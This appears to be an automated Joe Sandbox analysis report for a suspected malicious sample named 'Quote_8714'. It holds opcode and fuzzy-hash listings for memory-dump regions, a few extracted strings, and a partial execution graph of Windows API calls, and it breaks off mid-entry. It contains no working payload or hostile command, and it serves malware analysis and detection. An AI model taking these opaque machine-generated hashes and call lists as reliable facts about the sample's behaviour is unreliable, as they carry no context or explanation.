                                                                                                      • Opcode ID: c2308f440a2aec05f59902f284c95eb29e0a946dcdf1e52aaf2e98e1d2437fca
                                                                                                      • Instruction ID: 71c816c58be4b21cd1fdea0f7d8c39f965a4e3de46c07c5d1de429ba08391fe4
                                                                                                      • Opcode Fuzzy Hash: c2308f440a2aec05f59902f284c95eb29e0a946dcdf1e52aaf2e98e1d2437fca
                                                                                                      • Instruction Fuzzy Hash: 1EF0E2363402115FC7056B6DE994EAABFA9EF8923070405B9F206C7271CF64DD8A83E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 97993486ddfe94c7eb3c74de9c835a4205906f9e2e745e9251ae0ec7c04f0645
                                                                                                      • Instruction ID: a05a03a81ae6c19538ecb4a312b5c69339c0949d5882ff3522ee788642cac21f
                                                                                                      • Opcode Fuzzy Hash: 97993486ddfe94c7eb3c74de9c835a4205906f9e2e745e9251ae0ec7c04f0645
                                                                                                      • Instruction Fuzzy Hash: E0F05E313006048FC725AB1AE88495BF7BAEFC9B25B150569E50A87761DF31AC86CB94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                      • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                                      • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                      • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed8404e34d21738a58ed049a9c1008d2f3fd6b178883c72b2d380fe14905b10e
                                                                                                      • Instruction ID: d6a746993fe55c017795cb6d25314e19d33587ebfc5d7034173cb350d98cab35
                                                                                                      • Opcode Fuzzy Hash: ed8404e34d21738a58ed049a9c1008d2f3fd6b178883c72b2d380fe14905b10e
                                                                                                      • Instruction Fuzzy Hash: 34F04935210600CFC704DB28D988A54BBE5EF4A708B0544E8E249CB372CB62EC81CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ffd102baedbbcb817da6a7a0c4cfd66810c310686acff434f7ba1ba9f5d4c037
                                                                                                      • Instruction ID: 3197d4f63ebb0d858a2ef5f5777ec083df50c10776ab12017f6e8a6e2b47ec49
                                                                                                      • Opcode Fuzzy Hash: ffd102baedbbcb817da6a7a0c4cfd66810c310686acff434f7ba1ba9f5d4c037
                                                                                                      • Instruction Fuzzy Hash: B1E01261F101146FA744EEB99C8149FBBEADF94554B11C079D509D7251FD30A94387D0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2922957fe3084e47f2ba4b6ec2acee187ed242ec4f7d8aeb3d4b98379bbe27a
                                                                                                      • Instruction ID: de960b4ffccb06b530ce09fecfde6c05301035b2a21f6553a9bcf3898fe74a11
                                                                                                      • Opcode Fuzzy Hash: a2922957fe3084e47f2ba4b6ec2acee187ed242ec4f7d8aeb3d4b98379bbe27a
                                                                                                      • Instruction Fuzzy Hash: 1CF065B1A05204DFD701EFB0E95259DBF75EB49204B1081A9D908A7266E6362F0BD762
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e8cd1d4226e8a123bd7d4a0a1b7086c0d107ae5a1e75d329677be63cd3b85823
                                                                                                      • Instruction ID: bb9776545967358707157ee507618198db0a560576824e5573792e082dfb99d0
                                                                                                      • Opcode Fuzzy Hash: e8cd1d4226e8a123bd7d4a0a1b7086c0d107ae5a1e75d329677be63cd3b85823
                                                                                                      • Instruction Fuzzy Hash: E9F0DF35250610CFC718DB2CDA88D59BBE6EF49B1971149E9E10ACB372CB72EC85CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b76efb86478ed585aa3c42f5ad032f6160e85d6d8c10c8dcfeb221de0f3c143d
                                                                                                      • Instruction ID: 3d18d10468e7ecff452301e7a382feed1dae96e6a485b7cc918f4b89cafdd47d
                                                                                                      • Opcode Fuzzy Hash: b76efb86478ed585aa3c42f5ad032f6160e85d6d8c10c8dcfeb221de0f3c143d
                                                                                                      • Instruction Fuzzy Hash: 61E0E536B001049FDB08CF9DD884DAEB7F5FF8C224B2180A9E619E7321E631AD05CA90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b3d6468b8cdf0be6ea044b39ea00a4a1a7de11331ce75c22d0ab3137673ffc4e
                                                                                                      • Instruction ID: d862c5073941e49c3a368720b8556abaaab0fd78caf9f5e414febec1ebe4f3ec
                                                                                                      • Opcode Fuzzy Hash: b3d6468b8cdf0be6ea044b39ea00a4a1a7de11331ce75c22d0ab3137673ffc4e
                                                                                                      • Instruction Fuzzy Hash: 0DE04F357486409FD718CB1CE8908A9BBE6AF8931036586ABF04AC7AB2C654ED178745
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c60bde7b541b2afef3f2d32f3603d14da7682221db152fb0b8fdc93ed1ecb630
                                                                                                      • Instruction ID: 7b54c77abf86b2bf5f8716a011498d70a2eea14dc1ce6e2c50ef1e11ee7ef740
                                                                                                      • Opcode Fuzzy Hash: c60bde7b541b2afef3f2d32f3603d14da7682221db152fb0b8fdc93ed1ecb630
                                                                                                      • Instruction Fuzzy Hash: AFE01A76E5011DDBCF14AF91E9047EEFB70FF85716F204412E212B1960D7751551CEA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
                                                                                                      • Instruction ID: 5c7552a1aa9ec9ebfc5a7dd50386eb79d9af3ffb138c5e04886706f0af0fe2db
                                                                                                      • Opcode Fuzzy Hash: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
                                                                                                      • Instruction Fuzzy Hash: 14F07F76E0021ACBCF009F85D85059CFBB1FF59325B158296DA587B211E370AA968B80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f592bd9cf4d16045749ba57c4f2f48c822626451c4497854d9985f1c8209efdf
                                                                                                      • Instruction ID: 9224be92300486e4cb281a672ff1b45e211a94ec076246106f0fd113b26bc4b5
                                                                                                      • Opcode Fuzzy Hash: f592bd9cf4d16045749ba57c4f2f48c822626451c4497854d9985f1c8209efdf
                                                                                                      • Instruction Fuzzy Hash: 26E0E6B1A01208EFDB00FFA4E94145DBBB5EB483047108599E80997319DB366F15EB51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1dee40c54a70e952bb73f92e2a16460abb3ccbc199eaa6998f022452397254f
                                                                                                      • Instruction ID: 4e4799cce53eeb091569b5359c3c9a784a7d1da75b1d3b2520df617665a27d74
                                                                                                      • Opcode Fuzzy Hash: e1dee40c54a70e952bb73f92e2a16460abb3ccbc199eaa6998f022452397254f
                                                                                                      • Instruction Fuzzy Hash: F3D05E303107149FC728DB1CE840C5AB3EAEF8871032586BAF109C7771DA60FC064784
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0afda636aae613bf2df9f64ce1b142f136996e59eab88050bafcfa7cb1c905c5
                                                                                                      • Instruction ID: fbdb416b0c793672b4ec1e6f92bbd48649abc8f247cb89d5c3994e09fa27cf6c
                                                                                                      • Opcode Fuzzy Hash: 0afda636aae613bf2df9f64ce1b142f136996e59eab88050bafcfa7cb1c905c5
                                                                                                      • Instruction Fuzzy Hash: E1D022273252200BC309217CFC433E827D6CBCA651B4A80BBF612D3782CC2C8C0723A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 082198687b50afc6145880d4aefde3e0f53f914c7fe9b740d8dab24ad1c47e48
                                                                                                      • Instruction ID: a04c857c336b3cd774e39f9b6ceed0ff6b2e4af4e24feb440e5cd77441558b5c
                                                                                                      • Opcode Fuzzy Hash: 082198687b50afc6145880d4aefde3e0f53f914c7fe9b740d8dab24ad1c47e48
                                                                                                      • Instruction Fuzzy Hash: EBE09236101209DFCB05EF54D844C557BBAFF05305B55C0A6EA094F231D732E966DB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 623a1491f54255f36ebceb977d17dc873d06c2a504d5319ce1a85c06c733984f
                                                                                                      • Instruction ID: a411fbac512e200a37a6cd40af3a5702d06a8921c2ade94e62718c71e4c46826
                                                                                                      • Opcode Fuzzy Hash: 623a1491f54255f36ebceb977d17dc873d06c2a504d5319ce1a85c06c733984f
                                                                                                      • Instruction Fuzzy Hash: 90D0127175820A87DB185BB6FC5DF36739C9F8070AB044079E90EC1550FB96F853E521
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d36ec6cc00ceebd4334079e8450d2e7b1675017626b343337d1363a3c259dd13
                                                                                                      • Instruction ID: 0ee779ac7d49cb4650ceda15a5d49031c41a2828c298b54a147ba439f3ed9653
                                                                                                      • Opcode Fuzzy Hash: d36ec6cc00ceebd4334079e8450d2e7b1675017626b343337d1363a3c259dd13
                                                                                                      • Instruction Fuzzy Hash: 26D0A7715082898BC70417A6A858F753B28AF44615F080078DA4541022FA44B813E611
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 634dadbeb13e51d9ac61b5560d85a01f8d6dc5a5b68b63e43b659aa1f7dd3a80
                                                                                                      • Instruction ID: d8adb3943f5e372de5f4b5d38f76250bf05d4238b0c4803f7a1bc48b710f2cb4
                                                                                                      • Opcode Fuzzy Hash: 634dadbeb13e51d9ac61b5560d85a01f8d6dc5a5b68b63e43b659aa1f7dd3a80
                                                                                                      • Instruction Fuzzy Hash: C7C04C2275553513E70821E9A8515ED678DCBCAA69B01407AD61D976418C85CD4307DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: caf020a2751b39766a633093b1bd476afe94306334a369feefbb9a5c9a7ec122
                                                                                                      • Instruction ID: c8d6dbd33edc8425d1076cc18dcf490a49060814e6473b15acb44dbbe025f253
                                                                                                      • Opcode Fuzzy Hash: caf020a2751b39766a633093b1bd476afe94306334a369feefbb9a5c9a7ec122
                                                                                                      • Instruction Fuzzy Hash: 1DB09B2231453513D708319D68105BE72CD4BC6669F410067960D977418CC59C4207DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $(&^q$(bq$Hbq
                                                                                                      • API String ID: 0-1723523991
                                                                                                      • Opcode ID: bc3ef87479ec2829e191669bd370717333691e51981b491597d8f3160d9ccdc4
                                                                                                      • Instruction ID: d08661fc96c3cf48a68d6e9d12ce464605de52eaede081d33844588609736e55
                                                                                                      • Opcode Fuzzy Hash: bc3ef87479ec2829e191669bd370717333691e51981b491597d8f3160d9ccdc4
                                                                                                      • Instruction Fuzzy Hash: FB91CE70E0121A9FDB18DF79C844AAFBAF6EF88704F108429E416E7354DF359A05CBA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: fff?
                                                                                                      • API String ID: 0-4136771917
                                                                                                      • Opcode ID: 0093239d104e32995563500b04e954c4259746077e1b00e2bd32975ef34b19ec
                                                                                                      • Instruction ID: 60f73455fd2ee381776cf986d7dcdc06151c41050f68f5eeebb2608a18c89f1d
                                                                                                      • Opcode Fuzzy Hash: 0093239d104e32995563500b04e954c4259746077e1b00e2bd32975ef34b19ec
                                                                                                      • Instruction Fuzzy Hash: 4962263681061ADECF11DF90C884AD9B7B2FF9A304F1586D5E9087B161EB71AAD5CF80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: KOP
                                                                                                      • API String ID: 0-1291419287
                                                                                                      • Opcode ID: 52c7c7f5ccc6a505933f93cefca183610833c74b5e4b3beef597a3988beb1c8d
                                                                                                      • Instruction ID: 496258988961825a380b8d8d28bc9e34bd352038035c5ec371ae2b917402e66b
                                                                                                      • Opcode Fuzzy Hash: 52c7c7f5ccc6a505933f93cefca183610833c74b5e4b3beef597a3988beb1c8d
                                                                                                      • Instruction Fuzzy Hash: AAE1C8B4E102198FCB14DFA9C5809AEBBF2FF89304F248159E415AB356D731AD82CF61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 82c784e4303565533dca55f59f3be3ede6dd8c1a01c50072a9fc910b8af6fef6
                                                                                                      • Instruction ID: ec88f7ebcf50ce0c23b3ea194d3e5b69a69ccab865986a8601f2ac149e97ba35
                                                                                                      • Opcode Fuzzy Hash: 82c784e4303565533dca55f59f3be3ede6dd8c1a01c50072a9fc910b8af6fef6
                                                                                                      • Instruction Fuzzy Hash: AC1295B8C827458AE310CF65E84C1893BB1BB45319FD04E2AD261DB2E5DBBC216ECF54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b4638193ba271fa9e1cfd2ddbb770e8cf0d0a02c98d5a8fcc91033ea49289590
                                                                                                      • Instruction ID: 1f396c50190e3869f321a5a1047e812cff3decc68c1ff2691d0c6b420114de31
                                                                                                      • Opcode Fuzzy Hash: b4638193ba271fa9e1cfd2ddbb770e8cf0d0a02c98d5a8fcc91033ea49289590
                                                                                                      • Instruction Fuzzy Hash: 8DE1C9B4E102198BCB14DF99C5809AEBBF2FF89305F24C169E454A7355D731AD42CFA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03cb94a957bb37665de32442b472c26af72ee9bde339248b1762021d20d22a34
                                                                                                      • Instruction ID: 849f1d83d1c69fba45155d267fec63257eb3f4a1cd11c7b01833bf4d3e3594ea
                                                                                                      • Opcode Fuzzy Hash: 03cb94a957bb37665de32442b472c26af72ee9bde339248b1762021d20d22a34
                                                                                                      • Instruction Fuzzy Hash: B4E1C8B4E102598FCB14DFA9C5809AEBBF2FB89304F248169E415BB355D731AD82CF61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 46b38417340ad3e7556d71268fae103c4b07e61759880b6bc2b71e4742980344
                                                                                                      • Instruction ID: 07e1aa81d36611d6aeecba64189aa426323240cc3f6020353a403a7cfd44eb11
                                                                                                      • Opcode Fuzzy Hash: 46b38417340ad3e7556d71268fae103c4b07e61759880b6bc2b71e4742980344
                                                                                                      • Instruction Fuzzy Hash: DEE1C7B4E142198FCB14DFA9C5809AEBBF2FF89304F248169E454AB356D731AD42CF61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 939e7fb3bb992e0c131aeca70e516068df219f723277a1e78f839b6fe0ed80c3
                                                                                                      • Instruction ID: d2d2504c44cf3271a6d08af25f816538a670441a8313d2f4ce20e5dd51f539b7
                                                                                                      • Opcode Fuzzy Hash: 939e7fb3bb992e0c131aeca70e516068df219f723277a1e78f839b6fe0ed80c3
                                                                                                      • Instruction Fuzzy Hash: BCA19032E002168FCF05EFB9D4505EEBBF6FF94300B1585AAE945AB265DB31E915CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78f0ab11db1639ae754ae88f3ef88e1780f561991b52db3165e15f40862e95d5
                                                                                                      • Instruction ID: 4a92e9d2fc14daebcfc8121f63ce796f5ae50cda1e98fd2c6a17cb2ee1831ac6
                                                                                                      • Opcode Fuzzy Hash: 78f0ab11db1639ae754ae88f3ef88e1780f561991b52db3165e15f40862e95d5
                                                                                                      • Instruction Fuzzy Hash: 8D219A83969AB88BDB91917788BA2C52BC1DB1B11CF18D7ACD2F8255E3E5550083C346
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7b85311b76aefa93eb48618a1dcf909f489f7190960462308f2202dc3e88ea9b
                                                                                                      • Instruction ID: 3fa8271806ea6903d5ba30141c9fe48e140427171d0d1aebdd62e9ad87137f44
                                                                                                      • Opcode Fuzzy Hash: 7b85311b76aefa93eb48618a1dcf909f489f7190960462308f2202dc3e88ea9b
                                                                                                      • Instruction Fuzzy Hash: E22188C396AEB8CBDB91917788BA2C52BC1DB1B11CF18D7ACD2BC256E3E5550043D346

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.5%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:89
                                                                                                      Total number of Limit Nodes:9
                                                                                                      execution_graph 29483 cad4e8 29484 cad52e GetCurrentProcess 29483->29484 29486 cad579 29484->29486 29487 cad580 GetCurrentThread 29484->29487 29486->29487 29488 cad5bd GetCurrentProcess 29487->29488 29489 cad5b6 29487->29489 29490 cad5f3 29488->29490 29489->29488 29491 cad61b GetCurrentThreadId 29490->29491 29492 cad64c 29491->29492 29493 ca7e88 29494 ca7e8d 29493->29494 29495 ca7eab 29494->29495 29497 ca83e0 29494->29497 29498 ca83ea 29497->29498 29499 ca840a 29498->29499 29502 6312db8 29498->29502 29507 6312dc8 29498->29507 29499->29494 29503 6312ddd 29502->29503 29504 6313028 29503->29504 29505 6313048 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29503->29505 29506 6313058 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29503->29506 29504->29499 29505->29503 29506->29503 29509 6312ddd 29507->29509 29508 6313028 29508->29499 29509->29508 29510 6313058 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29509->29510 29511 6313048 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29509->29511 29510->29509 29511->29509 29512 cad900 29513 cad91b DuplicateHandle 29512->29513 29514 cad996 29513->29514 29515 cae7b0 29516 cae7de 29515->29516 29519 cacd4c 29516->29519 29518 cae7fe 29520 cacd57 29519->29520 29521 caf1bc 29520->29521 29524 6326aa0 29520->29524 29529 6326a90 29520->29529 29521->29518 29525 6326ac1 29524->29525 29526 6326ae5 29525->29526 29534 6326c50 29525->29534 29538 6326c41 29525->29538 29526->29521 29530 6326a96 29529->29530 29531 6326ae5 29530->29531 29532 6326c50 GetModuleHandleW 29530->29532 29533 6326c41 GetModuleHandleW 29530->29533 29531->29521 29532->29531 29533->29531 29536 6326c5d 29534->29536 29535 6326c96 29535->29526 29536->29535 29542 632358c 29536->29542 29539 6326c50 29538->29539 29540 6326c96 29539->29540 29541 632358c GetModuleHandleW 29539->29541 29540->29526 29541->29540 29543 6323597 29542->29543 29545 6326d08 29543->29545 29546 63235c0 29543->29546 29545->29545 29547 63235cb 29546->29547 29553 63235d0 29547->29553 29549 6326d77 29557 632d380 29549->29557 29567 632d368 29549->29567 29550 6326db1 29550->29545 29556 63235db 29553->29556 29554 6328458 29554->29549 29555 6326aa0 GetModuleHandleW 29555->29554 29556->29554 29556->29555 29559 632d3b1 29557->29559 29561 632d3fd 29557->29561 29558 632d3bd 29558->29550 29559->29558 29563 632d380 GetModuleHandleW 29559->29563 29566 632d368 GetModuleHandleW 29559->29566 29577 632d5f8 29559->29577 29580 632d5ea 29559->29580 29560 632d5b3 29560->29550 29561->29560 29584 632d638 29561->29584 29563->29561 29566->29561 29569 632d3b1 29567->29569 29570 632d3fd 29567->29570 29568 632d3bd 29568->29550 29569->29568 29572 632d380 GetModuleHandleW 29569->29572 29573 632d5ea GetModuleHandleW 29569->29573 29574 632d5f8 GetModuleHandleW 29569->29574 29575 632d368 GetModuleHandleW 29569->29575 29571 632d5b3 29570->29571 29576 632d638 GetModuleHandleW 29570->29576 29571->29550 29572->29570 29573->29570 29574->29570 29575->29570 29576->29571 29579 632d638 GetModuleHandleW 29577->29579 29578 632d602 29578->29561 29579->29578 29581 632d5f3 29580->29581 29582 632d602 29580->29582 29581->29582 29583 632d638 GetModuleHandleW 29581->29583 29582->29561 29583->29582 29585 